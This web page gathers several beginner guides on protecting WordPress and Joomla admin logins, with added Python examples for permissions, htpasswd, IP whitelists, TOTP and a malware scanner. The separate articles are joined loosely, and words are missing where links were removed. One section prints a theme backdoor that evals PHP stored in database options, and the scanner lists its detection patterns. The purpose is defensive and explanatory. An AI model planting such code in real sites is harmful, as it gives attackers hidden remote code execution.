How to secure your WordPress admin login? Primitive measures and WPS Hide Login. Plugin to protect WordPress from hacking The WordPress admin panel is being attacked, what to do?

Hello, dear readers of the blog site. Today I want to talk about keeping a website secure and about some methods of protecting it from hacking. Unfortunately, I am not an expert in this area and my knowledge does not go beyond the scope of the article about, but I will simply describe my recent experience. I didn’t use anything complicated, but I hope that it will make working with my sites safer.

It's about two-layer authentication for logging into the admin panel of your website's engine (it should work on any CMS, but personally I only tested it on WordPress and Joomla). The protection is set up at the web server level, so attempts to guess the admin panel password (brute force) will not create an increased load on the hosting, and it is quite difficult to bypass. It is easy to install (literally in a few steps), and of all the knowledge it requires only attentiveness and the ability to access the site via FTP.

Well, I’ll also give a couple of actions that I applied to sites on the already obsolete Joomla 1.5 engine, which it makes no sense for me to migrate to a newer version, but which constantly get hacked and are used to send spam from my server. I performed the described actions recently, so I cannot claim that the sites have stopped being infected with viruses, but I hope so. In general, I tried to somewhat increase the crack resistance of Joomla 1.5.

How to protect Joomla 1.5 from hacking and viruses

As I mentioned above, the problem is that two of my sites that run Joomla 1.5 are constantly being hacked. We can consider them abandoned, because I don’t add new materials to them, but they regularly generate income (from posting articles from Miralinks and Webartex, as well as links from Gogetlinks). In general, it’s a pity to throw them away and transfer them to a new version of the engine “for scrap” (a pity for wasted time and effort).

All that remains is either to constantly monitor the load on the server and, when it increases, look for shells and other malware among the engine files, or to somehow strengthen the protection. To search for malware, I download the engine files to my computer and scan them with DoctorWeb and Aibolit. The former does not find everything, and the latter sees the enemy far too often where there is none, but I don’t know of any other effective methods. There are dozens of other programs, of course, but this is the most convenient way for me.

By the way, the Aibolit script can work not only on the server, but also directly on your computer, in the folder with the downloaded engine files (just don’t forget to disable your regular antivirus while downloading the site, because it may delete some of the files; they will still remain on the server).

Detailed instructions are given in the video below, but in short, you download the PHP language interpreter from the Microsoft website and install it. After which you open the Aibolit script file called ai-bolit.php using this very interpreter:

The scanning speed depends on the speed of your computer and on the number of files in your website engine. It took me several hours for https://site, because Aibolit suspects even pictures of hiding viruses, and I have a ton of pictures; the cache files also take a lot of time to scan. For the sites on Joomla 1.5, the check was much faster.

I decided to spend a day looking for ways to improve website security. I managed to do very little, but it is still better than nothing. Let's start with strengthening the protection (and reducing the vulnerabilities) of the two sites on Joomla 1.5. The following was done:


How else to protect Joomla 1.5 from viruses and streaming hacks

  1. Also, “experts” claim that sites on Joomla 1.5 are hacked in no time using the one available in the engine (supposedly you can change the admin password through it). Even if you don’t use registration on your website and don’t display a recovery link anywhere, this does not mean that you have closed this vulnerability. Just add the following snippet to the URL of your site's home page and you get the feature in question: /index.php?option=com_user&view=reset

    Actually, to close this loophole (but I still don’t understand how to use it for hacking), you can simply delete the following file:

    /components/com_user/models/reset.php

    True, after this none of the users registered on your site will be able to use the password recovery function, but for me this was not important, because registration was not provided.

  2. They also say that such a useful trick as adding to the page address also allows virus writers and hunters of other people’s property to get into some sensitive areas of your site and do something destructive to it, or abuse it in some other way. This thing is again removed by editing one of the engine files:

    /libraries/Joomla/application/module/helper.php

    There you need to remove two pieces of code, or comment them out, enclosing them in /* and */ (this code will not be executed by the language interpreter). The first fragment is like this:

    if (count($result) == 0) {
        if (JRequest::getBool("tp")) {
            $result = JModuleHelper::getModule("mod_".$position);
            $result->title = $position;
            $result->content = $position;
            $result->position = $position;
        }
    }

    And the second one is like this:

    if (JRequest::getBool("tp")) {
        $attribs["style"] .= " outline";
    }

    Actually, after this you reset the cache and try to view the positions of the modules in your template using this construction:

    https://site/?tp=1

    If the module positions are no longer shown, then you have hopefully closed this hole.

  3. Very often sites are hacked not from the outside, but from the inside. Trojans and keyloggers on your computer know what to look for and where, so do not store passwords in FTP clients (there is an option to use for this purpose). It is considered even better to disable access to your site via plain FTP altogether and instead use, where the transmitted information (including passwords) is encrypted, which makes intercepting it useless. To be honest, I neglect the last piece of advice because of my “darkness”. There is also the option of allowing access to your site via regular FTP only from a specific IP address (your computer’s), but my Internet provider gives me a dynamic IP (it changes within a certain range).
  4. It is also advised to set the engine’s file and folder permissions no higher than those actually required for its operation. In fact, without really thinking about it, I set them according to the usual template: 755 for folders and 644 for files. You can do all this with the same FileZilla. Moreover, these permissions must be applied not only to the directories in the root folder, but also to all directories and files inside them.

    I set the permissions to 444 for the files in the root folder, and 705 for the tmp and logs directories. Of course, I could have tightened it further, but I don’t have much experience with this, and there was no time for experiments. Besides, all this will not seriously deter hackers, because there are things that can nullify all our efforts: PHP code running on the server can change the permissions back, using commands like this:

    Therefore, in order to completely “concrete” the files of the Joomla 1.5 engine from hacking and encroachment, it is necessary to prohibit changing access rights to files and folders via PHP. This is done in the server settings, but I don’t know how and where yet. If you know, please post a link.

  5. All of the above is designed to reduce the likelihood of your site being hacked and penetrated by shells and other malware. However, the precautions taken are not a guarantee, so it would be great on the server (where your Joomla 1.5 site lives). This would remove all the negativity from the evil that leaked in. But personally, again, I have not yet implemented this, for reasons of my “darkness”. I would be grateful for links to materials explaining this process.
  6. Very often websites are hacked after someone gains access to the administrative panel. Of course it is password protected, but with brute force (systematic guessing) many even seemingly complex passwords are cracked in no time. That's why the admin panel also needs to be protected, and it’s better to do this not with additional extensions but with server tools. There are several protection options. For example, you can change the URL of the admin panel in one way or another so that a hacker cannot even begin his dirty business.

    Another method of protection, which will be described in detail below, is to put an additional barrier in the attacker’s path (whether a living person or a script). It consists of password-protecting the directory with the admin files (in Joomla this is the administrator folder, in WordPress it is wp-admin) by means of the web server. As a result, when accessing the admin panel you will first have to enter the login and password for the folder, and only then the login and password for the engine’s admin panel itself. Moreover, while malware is hammering this first line of defense with brute force, it will not create any significant additional load on the server, because the web server rejects the request before the engine’s PHP code is ever run.

  7. Another, in my opinion, very important rule for protecting your sites from hacking and virus infection: one site, one hosting account. Yes, it's more expensive, but much safer. When hosted on one account, all your sites become immediately accessible via FTP if the malware gains access to just one of them. Sites are hacked automatically, and it would be unreasonable to hope that the scripts will not climb up the directory tree. In addition, it is very difficult to clean up a bunch of sites on one hosting account, because while working on one site you lose sight of an already cured one, which is being reinfected at the same time.
  8. By the way, you can be hacked not only through your own site but also through your hosting neighbour’s site, if the hoster has not taken proper care to rule out this possibility. The hosting panel (such as) can also be hacked, but in any case the number of hacks that are the hoster’s fault is negligible compared to the number of hacks caused by the carelessness of site owners.
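The permission clean-up described in items 4 and 5 above, written out as an added Python example that is not from the original post: it applies the 755/644 template to a whole tree (symlinks are skipped), audits for world-writable entries before and after, and runs on a constructed throw-away tree. The directory layout and file names in the demo are made up; pass other modes to `harden_permissions` to reproduce the author's stricter 444 / 705 choice for particular paths.

```python
import os
import stat
import tempfile


def _set_mode(path, mode):
    """chmod one entry if its permission bits differ; symlinks are left alone. Returns 1 if changed."""
    if os.path.islink(path):
        return 0
    current = stat.S_IMODE(os.lstat(path).st_mode)
    if current == mode:
        return 0
    os.chmod(path, mode)
    return 1


def harden_permissions(root, dir_mode=0o755, file_mode=0o644):
    """Apply the article's template (755 for folders, 644 for files) to root and everything below it.
    Returns how many entries actually had to be changed."""
    changed = 0
    for dirpath, _dirnames, filenames in os.walk(root):
        changed += _set_mode(dirpath, dir_mode)
        for name in filenames:
            changed += _set_mode(os.path.join(dirpath, name), file_mode)
    return changed


def audit_world_writable(root):
    """List entries that any local user (for example a neighbour's hijacked PHP process) can write to."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            if os.path.islink(path):
                continue
            if stat.S_IMODE(os.lstat(path).st_mode) & stat.S_IWOTH:
                found.append(path)
    return sorted(found)


def mode_string(path):
    """Permission bits of one entry as the familiar octal string, e.g. '644'."""
    return format(stat.S_IMODE(os.lstat(path).st_mode), "o")


def demo():
    """Constructed mini site tree with sloppy permissions: audit, harden, audit again."""
    root = tempfile.mkdtemp(prefix="joomla-demo-")
    tmp_dir = os.path.join(root, "tmp")
    os.mkdir(tmp_dir)
    config = os.path.join(root, "configuration.php")
    with open(config, "w") as fh:
        fh.write("<?php // constructed placeholder, not a real Joomla config\n")
    os.chmod(config, 0o666)   # world-writable file: a dropped shell could overwrite it
    os.chmod(tmp_dir, 0o777)  # world-writable directory: a shell could be created inside
    before = audit_world_writable(root)
    changed = harden_permissions(root)
    after = audit_world_writable(root)
    return root, before, changed, after


if __name__ == "__main__":
    root, before, changed, after = demo()
    print("world-writable before:", before)
    print("entries changed:", changed)
    print("world-writable after:", after)
```

The PHP-side chmod that item 5 warns about is what php.ini's `disable_functions` directive (with `chmod` in its list) switches off; on shared hosting that directive is usually set by the hoster, which is why the author could not find it in the site's own files.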

How to protect the admin area of your website from hacking?

I want to talk in detail about the protection method I recently used myself. It consists in restricting access to the folder where the site’s administrative panel files are located. The restriction is set using the wonderful .htaccess file, which, in essence, lets you remotely control the settings of the web server your site runs on. And it can do this selectively.

All directives written in .htaccess will only apply to the directory in which it is located. Do you want to change something in the settings for the entire site? Then place .htaccess in the root folder. Well, we are only interested in the settings regarding the folder with the admin files, so we will place it there. In Joomla this will be the administrator folder, in WordPress - wp-admin.

However, we can’t get by with .htaccess alone. You will also need .htpasswd, where the login and password for accessing this administrative folder will be stored. Moreover, the password will not be stored in clear text but as an MD5 hash. The password cannot be recovered from it, but when you enter a combination in the password field, the web server computes the MD5 hash of that combination and compares it with what is stored in .htpasswd. If they match, you are let into the Joomla or WordPress admin area; if not, you are not.

That's all; all that remains is to bring the plan to life. You need to add some directives to .htaccess. Do you know which ones? I didn't. And somehow you will need to convert the password into an MD5 hash. A problem. However, it has a fairly simple solution. Good people have set up an online service that generates the contents of the .htaccess file and the .htpasswd file from the username and password you choose. True, you will also have to specify the absolute path to the administrative folder, but this is trivial.

So, meet the great and terrible protection generator for the admin panel of your site. Impressive, right? You come up with, or better still, generate using, two complex combinations of letters, numbers and symbols, and enter them into the two top fields. Just don’t forget to write them down or put them in a password manager, otherwise you won’t be able to log into the admin area and will have to start doing everything described in this part all over again.

Here, now. Do you know this one? Even if you don’t, it doesn’t matter. Connect to the site via FTP, create a file in its root with any name (say, url_path.php) and add this simple code to it:

    <?php
    echo "Full path to the script and its name: ".$_SERVER["SCRIPT_FILENAME"]."<br>";
    echo "Script name: ".$_SERVER["SCRIPT_NAME"];
    ?>

Then go to the browser and enter this URL into the address bar (with your domain, of course):

https://site/url_path.php

As a result, you will see the absolute path you were interested in. Enter it into the .htaccess and .htpasswd generator mentioned above. Don't forget to add the name of the administrator or wp-admin folder to the end of this path, without a trailing slash. That’s it, now click the “Generate” button.

And one by one, transfer the contents for the .htaccess and .htpasswd files directly to these same files.

I hope that you have already created them in the administrator or wp-admin folders (depending on the engine you use)?

Well, now try to log into the admin panel. A window appears asking you to enter the username and password for your web server? It is rendered differently in different browsers, but in Chrome it looks like this:

If something doesn’t work, double-check the absolute path to .htpasswd written in the .htaccess file. In that case, just correct it manually when editing the file. That's all I wanted to tell you today. If you want to criticize or add something, go ahead.
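What the generator from the section above produces, and what the web server does with it on each request, as an added Python example that is not the generator's code or anything from the post. The page's generator emits MD5 (`$apr1$`) entries; this example writes Apache's `{SHA}` format (the one `htpasswd -s` produces) because the standard library computes it directly, and the same comparison logic applies. The admin folder path and the `admin`/`secret` pair are constructed placeholders.

```python
import base64
import hashlib
import hmac


def htpasswd_line(user, password):
    """One .htpasswd entry in Apache's {SHA} format: base64 of the raw SHA-1 digest.
    The plaintext password never appears in the file."""
    digest = hashlib.sha1(password.encode("utf-8")).digest()
    return f"{user}:{{SHA}}{base64.b64encode(digest).decode('ascii')}"


def htaccess_for(admin_dir_abs_path, realm="Restricted area"):
    """The .htaccess that goes into the admin folder (administrator or wp-admin).
    AuthUserFile must be an absolute path, which is why the article has you look it up first."""
    return "\n".join([
        "AuthType Basic",
        f'AuthName "{realm}"',
        f"AuthUserFile {admin_dir_abs_path.rstrip('/')}/.htpasswd",
        "Require valid-user",
        "",
    ])


def verify(htpasswd_text, user, password):
    """What the web server does for every request to the protected folder: hash the submitted
    password and compare it with the stored digest. Unknown users and unsupported hash
    formats are simply refused."""
    for line in htpasswd_text.splitlines():
        if not line or line.startswith("#") or ":" not in line:
            continue
        name, stored = line.split(":", 1)
        if name != user or not stored.startswith("{SHA}"):
            continue
        candidate = htpasswd_line(user, password).split(":", 1)[1]
        # constant-time comparison, so response timing does not reveal how much of the hash matched
        return hmac.compare_digest(candidate.encode(), stored.encode())
    return False


if __name__ == "__main__":
    # constructed values: a hypothetical admin folder and a throw-away password
    admin_dir = "/home/user/public_html/wp-admin"
    entry = htpasswd_line("admin", "secret")
    print("--- .htaccess ---")
    print(htaccess_for(admin_dir), end="")
    print("--- .htpasswd ---")
    print(entry)
    print("right password accepted:", verify(entry, "admin", "secret"))
    print("wrong password accepted:", verify(entry, "admin", "Secret"))
```

Two practical notes. Apache's stock configuration refuses to serve any file whose name starts with `.ht`, so the `.htpasswd` placed in the admin folder is not downloadable, though keeping it outside the web root is still the cleaner choice. On WordPress, `wp-admin/admin-ajax.php` is also called by the public front end, so a theme or plugin that relies on it needs that one file exempted from the `Require valid-user` rule; where the `htpasswd` tool is available, `htpasswd -B` (bcrypt) gives stronger entries than either MD5 or `{SHA}`.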

Virus in WordPress?

After writing this article, I discovered malware on my blog (https://site) (or rather, something that was installed without my consent). I just wanted to change something in the code and went into . At the very bottom, immediately before the body tag, I was struck by a call to some function unfamiliar to me (I searched for its name but found nothing useful):

The name seems sane. Notably, about three weeks earlier I had accidentally discovered a new table in the databases of two of my WordPress blogs (https://site and another one). Its name was simply wonderful: wp-config. Googling this name again yielded nothing useful, because all the answers were about the wp-config.php file of the same name.

This table grew quickly (up to a hundred megabytes on https://site), and the addresses of my site’s pages with various parameters were written into it. Not understanding the essence of this process, I simply dropped the table, and that was it. By the way, I have another blog on WordPress, and nothing like this was observed there.

Well, here I found a similarly “telling” insertion in the theme. I decided to check whether anything matching the call described above at the bottom of the footer had been added there. It turned out it had. And so neatly: neither at the very top nor at the very bottom, but the second (or third) function from the top:

    // runs whatever PHP text is stored in the wp_custom_page_links option of the database
    function wp_custom_page_links_return() {
        $option = get_option("wp_custom_page_links");
        @eval($option);
    }
    // same trick, executed on every load straight from the wp_brlinks option
    @eval(get_option("wp_brlinks"));

This is where the wonderful “eval” catches your eye. Notably, Aibolit (described above) had flagged this fragment as suspicious, but I hadn’t got around to it yet, because this script suspects far too much of being unreliable. I also googled this code and found a post (unfortunately, that domain is now blocked for non-payment) describing a similar problem. The fellow got this junk together with a new theme that had installation code embedded in it.
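A minimal version of the kind of check Aibolit runs over downloaded engine files (described earlier on this page), tuned to the insertion found in the theme above, as an added example rather than anything from the post or from Aibolit itself: it walks PHP files and flags lines that execute code pulled from the database or decoded at runtime. The sample theme text is built from the fragment quoted above; the file names in the demo are made up.

```python
import os
import re
import tempfile

# Constructed sample: the fragment found in the theme on this page, plus a benign function.
SAMPLE_THEME = """<?php
function wp_custom_page_links_return() {
    $option = get_option("wp_custom_page_links");
    @eval($option);
}
@eval(get_option("wp_brlinks"));
function theme_setup() { add_theme_support("post-thumbnails"); }
"""

# Ordered from most to least specific; the first pattern that matches a line labels it.
SUSPICIOUS = [
    ("eval-of-database-option", re.compile(r"\beval\s*\(\s*get_option\s*\(")),
    ("eval", re.compile(r"\beval\s*\(")),
    ("runtime-decoding", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("dynamic-code", re.compile(r"\b(create_function|assert)\s*\(")),
]


def scan_source(text, path="<string>"):
    """Return (path, line_no, label, stripped_line) for each flagged line of one PHP file."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for label, pattern in SUSPICIOUS:
            if pattern.search(line):
                hits.append((path, line_no, label, line.strip()))
                break
    return hits


def scan_tree(root, extensions=(".php", ".phtml", ".inc")):
    """Scan every PHP-like file below root (e.g. a downloaded copy of the site); unreadable files are skipped."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits.extend(scan_source(fh.read(), path))
            except OSError:
                continue
    return hits


def demo():
    """Write the constructed sample into a throw-away theme folder and scan it."""
    root = tempfile.mkdtemp(prefix="theme-scan-demo-")
    with open(os.path.join(root, "functions.php"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_THEME)
    with open(os.path.join(root, "readme.txt"), "w", encoding="utf-8") as fh:
        fh.write("eval( appears here as prose, and .txt files are not scanned\n")
    return scan_tree(root)


if __name__ == "__main__":
    for path, line_no, label, line in demo():
        print(f"{path}:{line_no}: [{label}] {line}")
```

Like Aibolit, this produces false positives (some legitimate plugins do call `base64_decode`), so the output is a list to review, not a verdict; the `eval-of-database-option` label is the one that matches the infection described above and is almost never legitimate.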

I have had the themes on both infected blogs for many years. There must have been some kind of vulnerability in the engine or , which was quickly (en masse) exploited by ill-wishers. In general, check yourselves for the absence of such insertions. The modification date of the described files was, as far as I can tell, in mid-September of this year.

I also advise you to look at a selection of 17 video lessons on securing websites on Joomla. They will play one after another automatically, and if you want, you can switch to the next lesson using the corresponding button on the player panel or select the desired lesson from the drop-down menu in the upper left corner of the player window:

Enjoy watching!

Good luck to you! See you soon on the pages of the blog site


WordPress is a very popular CMS. This is undoubtedly its advantage, as there are many plugins for any task, but it is also its weakness: the more popular a CMS is, the more attacks there are on it, or rather the more interesting it is to an attacker, because having found a vulnerability in WordPress, an attacker gains access to hundreds of thousands of sites. So protecting your WordPress site requires special attention.

Why do WordPress sites get hacked?

All popular CMS (website engines) get hacked, and WordPress is no exception. Sites are hacked mainly using so-called exploits (programs or scripts) to gain control over the site. This is done mainly to plant links from your site to other resources and to build a botnet that carries out DDoS attacks on other servers, while the site stays in working order and you will never see with the naked eye that it is infected. In any case, the hack will have a bad effect on your site, and you may even disappear from the search results.

As I already said, hacking happens automatically. Identifying a site's CMS is not difficult; there are many online services for this. Often an attacking program tries to guess the password to the administrative part of the site, i.e. it goes to the address your-site.ru/wp-admin and tries to guess the password of your user. Finding out the username is not difficult either: you write articles under it, so the login is visible to bots, and they know where to look for it, unless, of course, you hid it using a plugin, one of which we will talk about below. The site administrator's password should be very complex, but even if this condition is met, you cannot let bots try (brute force) the “admin” password, because this is unnecessary load on the server; imagine several dozen bots from different parts of the world doing this.

Plugin to protect WordPress from attacks

Let’s move straight to the plugin. There are several worth considering; let’s talk about a simpler and more understandable one. I use it on many of my projects and for clients, and it copes very well with the task of protecting the site -

This plugin is quite easy to learn and is 90% Russified. It is installed like any plugin from the WordPress repository; after installation you need to activate it and make the basic settings. It appears in the main menu of the WordPress admin area.

WP Security Plugin Control Panel

After going to the plugin settings, we get to the control panel. Here you can make basic important settings.

  1. Shows the last 5 logins to your admin panel, with the user and IP address specified. For example, I immediately see my own IPs, there are only two of them, so I can be sure that no one else knows my password for the administrative part.
  2. The section of the most important functions, here you need to include everything and agree with everything.
  3. The plugin can track file changes on the hosting and send you a report by email, so you are always aware of which files have changed. This is very useful: if some script or any file with malicious code has been uploaded to your site, you will immediately see it in the report. The only negative is that after updating any other plugins you have installed, or the WordPress engine itself, WP Security will see all these changes and send you a huge list; but you get used to these reports, because you know when you updated the files yourself.
  4. This item changes the standard address of the site’s admin panel, yoursite.ru/wp-admin, to yoursite.ru/luboe-slovo. This will save your admin panel from some would-be hackers and bots, but unfortunately not from all of them; the more advanced ones still find it, as I can see from the “Authorizations” section, but more on that later.
  5. This item should be turned off, as in the screenshot. It is only needed when you want to put the site into maintenance mode: visitors will be shown a notice that the site is undergoing technical work. Sometimes this is useful, for example when changing the design of the site or making some global changes, but do not forget that in this mode search robots also cannot view your site, so do not close it for long.

Protecting the WordPress admin area from password guessing

Now let's go to the menu item Authorization; in my opinion a very useful item, and worth setting up. On one of my sites, with about 1000 visitors a day, the plugin catches dozens of attempts a day to guess the admin panel password and adds the attackers’ IP addresses to the blacklist, i.e. blocks them completely: the site stops responding to that IP address, thereby nullifying the attempts to find the password. The settings I use are shown in the screenshot.

  1. I leave the number of allowed “mistakes” at 3; don’t set it lower, you may enter the password incorrectly yourself and end up on the blacklist with your own IP, and then you’ll have to
  2. This is the time after which the counter of incorrect login attempts is reset.
  3. I set the blocking period for IP addresses from which incorrect login attempts were made to a long one, in minutes, i.e. a ban for a long time; the screenshot shows 6,000,000 minutes, that’s about 11 years, I think that’s enough.

All blocked IPs will be denied access not only to the admin panel, but to the entire site, keep this in mind

List of blocked IP addresses

  1. attacker's IP address
  2. the login for which the password was being guessed; by the way, it is the correct one
  3. date when the automatic blocking was made

White list of addresses for the admin panel

To allow access to the administrative part of a WordPress site only from certain IP addresses, you can activate the white list of addresses in the plugin settings.

  1. activating this option
  2. here is your current IP address
  3. in this field enter all IP addresses from which access to the admin panel is allowed

If you need to specify a range of IP addresses, then use an asterisk instead of a number, for example 192.168.5.*; this pattern will give access to the WordPress admin panel from all IPs starting with these numbers. This method can be useful for those who do not have a dedicated IP address and whose address is constantly changing, for example when working over mobile Internet; as a rule, the range will stay within the first two octets, like this: 192.168.*.*
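How a whitelist entry like `192.168.5.*` or `192.168.*.*` is matched against a visitor's address, as an added Python example that is not the plugin's code: the trailing asterisks are turned into a network prefix (8 bits per fixed octet), single addresses and CIDR notation are accepted as well, and malformed entries are rejected rather than silently allowing everyone. The whitelist and client addresses in the demo are constructed.

```python
import ipaddress


def rule_to_network(rule):
    """Convert one whitelist entry into an IPv4 network.
    Accepts a single address (203.0.113.7), CIDR (203.0.113.0/24), or the plugin's
    trailing-asterisk form (192.168.5.* or 192.168.*.*)."""
    rule = rule.strip()
    if "/" in rule:
        return ipaddress.ip_network(rule, strict=False)
    parts = rule.split(".")
    if len(parts) != 4:
        raise ValueError(f"expected four dotted parts: {rule!r}")
    fixed = []
    wildcard_seen = False
    for part in parts:
        if part == "*":
            wildcard_seen = True          # every later part must also be '*'
        elif wildcard_seen:
            raise ValueError(f"wildcards must be trailing: {rule!r}")
        else:
            octet = int(part)             # raises ValueError on junk such as '1a'
            if not 0 <= octet <= 255:
                raise ValueError(f"octet out of range: {rule!r}")
            fixed.append(str(octet))
    if not fixed:
        raise ValueError("'*.*.*.*' would allow everyone, which defeats the whitelist")
    base = ".".join(fixed + ["0"] * (4 - len(fixed)))
    return ipaddress.ip_network(f"{base}/{8 * len(fixed)}", strict=False)


def rule_is_valid(rule):
    """True if the entry parses; useful for validating the settings field before saving it."""
    try:
        rule_to_network(rule)
        return True
    except ValueError:
        return False


def is_allowed(client_ip, rules):
    """True if the client address falls inside any whitelist entry."""
    address = ipaddress.ip_address(client_ip)
    return any(address in rule_to_network(rule) for rule in rules)


if __name__ == "__main__":
    # constructed whitelist: a fixed office address plus a mobile operator's range
    whitelist = ["203.0.113.7", "192.168.5.*"]
    for ip in ["203.0.113.7", "192.168.5.200", "192.168.6.1", "198.51.100.4"]:
        print(ip, "allowed" if is_allowed(ip, whitelist) else "denied")
```

Worth keeping in mind when using the two-asterisk form for mobile connections: `192.168.*.*` is a /16, i.e. 65,536 addresses shared with every other customer of that operator, so it narrows the attack surface but is no substitute for the lockout and a strong password.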

Hello everyone, in this tutorial. And truthfully, it will be short but useful, especially for beginners. Do you know the statistics on how many sites are hacked? No? I can say that every fourth person has already been hacked, judging by what blog authors know about this fact, though the figure may be much lower. Now we will protect the WordPress admin area, because this is the very first and strongest wall.

Preface.

As always, a little theory. You see, the thing is that we are all people and our behaviour is the same: until something bites us in one place, we won’t bother, am I right? The point is that a site is hacked by a program that operates according to its own algorithms, and if your site gives way to those algorithms, then good luck.

Securing your site is the very first thing that must be done, and it must be done and checked constantly. Most administrators make the hackers’ job easier themselves, as described here. Or your passwords are simply stolen, for example from the program you use for FTP connections to your website.

Read all the articles in and protect yourself, and I also advise you to scroll through about viruses, it’s also very informative.

Authorization restriction plugin.

It is called Login LockDown and is installed in the standard way, directly through the WordPress admin panel. Enter its name in the search and install it as in the screenshot below. It’s the only one with that name, you can’t miss it.

Now it needs to be configured. In principle there are not many settings, but most articles on the Internet review older versions of this plugin, where they suggest doing a lot of things that are now useless. Let's start with a screenshot and a description below it (I split it into two parts for convenience).

  1. Path to plugin settings.
  2. Max Login Retries: the number of attempts a person can make; I set 3 as the optimal option. If none of these three attempts was correct, then access to the login is blocked.
  3. Lockout Length (minutes): based on the previous point, here we specify for how long to block between attempts to enter data; I set it to 1 minute. That is, suppose you log into the admin panel but fail the first time; then the WordPress admin protection is activated immediately, and you can continue only after the time specified here.
  4. Lockout Length (minutes): after several failures (I have three set), the plugin sees that all login attempts are useless and blocks the user’s IP; here we specify for how long, I have one hour.
  5. Lockout Invalid Usernames?: count attempts with an incorrect login as well; a required item.

  1. Mask Login Errors?: we also set this to yes, definitely. The thing is that WordPress itself tells you whether it was the login or the password that was entered incorrectly. This item is needed to hide those clues.
  2. Show Credit Link?: by default, if this item is not checked, the login page will say that everything is protected by the Login LockDown plugin. In order not to give away unnecessary information, we change this setting. In old articles on the Internet they advised digging into the plugin code and doing everything by hand, but time passes and this function has been implemented by the developers themselves.
  3. Once everything is done, click on this button and save the settings.
  4. Currently Locked Out. And here there will be a list of all the IP addresses that tried to hack the site, or rather, those whose entry limit was exceeded.

Conclusion.

Come on, don’t think of a blog as a static robot that you come to, write, optimize something, and that’s it. Remember my word

WordPress is one of the most popular CMS in the world. More than 18.9% of all Internet sites run on it, and the number of installations has exceeded 76.5 million. Unfortunately, such popularity has its downsides. According to a report from Sucuri, a company that specializes in website security, WordPress is the most hacked CMS in the world. However, if you follow best practices on this matter and implement a few of the techniques in our guide, you will realize that WordPress security can be easily strengthened with a few simple steps.

Before we start this guide, please make sure you have the following:

  • Access to the WordPress dashboard
  • Access to your hosting account (optional)

Step 1 – Keeping WordPress Up to Date

This is the first and most important step to improve WordPress security. If you want a clean, bloatware-free site, you need to make sure your WordPress version is up to date. This may seem like a simple tip, but only 22% of all WordPress installations are on the latest version.

WordPress introduced an automatic update feature in version 3.7, but it only applies minor security updates; major, key updates must be installed manually.

In case you don't know how to update WordPress, take a look here.

Step 2 – Using non-standard login credentials

Are you using admin as your WordPress admin username? If your answer is yes, then you are seriously weakening your WordPress security and making it easier for hackers to break into your control panel. It is strongly recommended that you change your admin username to something else (see this guide if you're not sure how to do this) or create a new admin account with different credentials. Follow these steps if you prefer the second option:

A good password plays a key role in WordPress security. It is much more difficult to crack a password consisting of numbers, lower and upper case letters and special characters. Tools like LastPass and 1Password can help you create and manage complex passwords. Additionally, if you ever need to log into your WordPress dashboard while connected to an unsecured network (such as coffee shops, public libraries, etc.), be sure to use a secure VPN that will protect your login information.

Step 3 – Enable Two-Step Verification

Two-step verification adds an extra layer of security to your login page. After the username is confirmed, it adds another step that must be completed for a successful login. Most likely, you already use this for your mail, online banking and other accounts containing sensitive information. Why not use it in WordPress too?

Although it may seem complicated, enabling two-step verification in WordPress is very easy. All you need to do is install the 2-Step Verification mobile app and set it up for your WordPress. You can find more detailed information on how to enable two-step verification on WordPress.
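What the 2-step verification app on your phone and the site agree on, as an added Python example that is not from the guide or from any WordPress plugin: the time-based one-time password of RFC 6238 (the scheme such apps implement), with the secret being the RFC's own published test key rather than anything real. The site-side check shown here accepts one 30-second step of clock drift either way and compares in constant time.

```python
import hashlib
import hmac
import time


def hotp(secret, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation, modulo 10^digits."""
    mac = hmac.new(secret, counter.to_bytes(8, "big"), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = ((mac[offset] & 0x7F) << 24
              | mac[offset + 1] << 16
              | mac[offset + 2] << 8
              | mac[offset + 3])
    return str(binary % (10 ** digits)).zfill(digits)


def totp(secret, unix_time, step=30, digits=6):
    """RFC 6238: the counter is the number of 30-second steps since the Unix epoch,
    which is why the phone and the server only need a shared secret and roughly synced clocks."""
    return hotp(secret, int(unix_time) // step, digits)


def verify_totp(secret, submitted, unix_time, step=30, window=1):
    """Server-side check: accept the current step and +/- window steps to absorb clock drift,
    and compare in constant time so response timing does not leak which digits matched."""
    counter = int(unix_time) // step
    return any(
        hmac.compare_digest(hotp(secret, counter + delta), submitted)
        for delta in range(-window, window + 1)
    )


# RFC 6238 test key (ASCII "12345678901234567890"); a real enrolment uses a random secret per user
TEST_SECRET = b"12345678901234567890"

if __name__ == "__main__":
    now = time.time()
    code = totp(TEST_SECRET, now)
    print("code right now:", code, "accepted:", verify_totp(TEST_SECRET, code, now))
    print("same code 5 minutes later accepted:", verify_totp(TEST_SECRET, code, now + 300))
```

The second step therefore adds nothing if the shared secret leaks along with the password (for example from a backup of the database), so the secret column deserves the same care as the password hashes.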

Step 4 – Disable PHP error reporting

PHP error reports can be quite useful if you are developing a website and want to make sure everything is working correctly. However, showing errors to everyone is a serious security flaw in WordPress.

You must fix this as quickly as possible. Don't be alarmed, you don't have to be a programmer to disable PHP error reporting on WordPress. Most hosting providers provide this option in their control panel. If not, then just add the following lines to your file wp-config.php. You can use or to edit the file wp-config.php.

error_reporting(0);
@ini_set('display_errors', 0);

That's it. Error reporting is disabled.

Step 5 – Don't use nulled templates for WordPress

Remember “Free cheese only comes in a mousetrap.” The same applies to nulled templates and plugins.

There are thousands of nulled plugins and templates all over the Internet. Users can download them for free using various file hosting services or torrent files. They don't know that most of them are infected with malware or black hat SEO links.

Stop using nulled plugins and templates. Not only is this unethical, but it also harms your WordPress security. You will end up paying more to the developer to clean up your site.

Step 6 – Scan WordPress for malware

To infect WordPress, hackers often use holes in templates or plugins. Therefore, it is important to check your blog frequently. There are many well-written plugins for this purpose. WordFence stands out from this crowd. It offers application guidance and automatic testing capabilities, along with a bunch of other miscellaneous settings. You can even restore modified/infected files in a couple of clicks. It is distributed free of charge. These facts should be enough for you to install it right now.

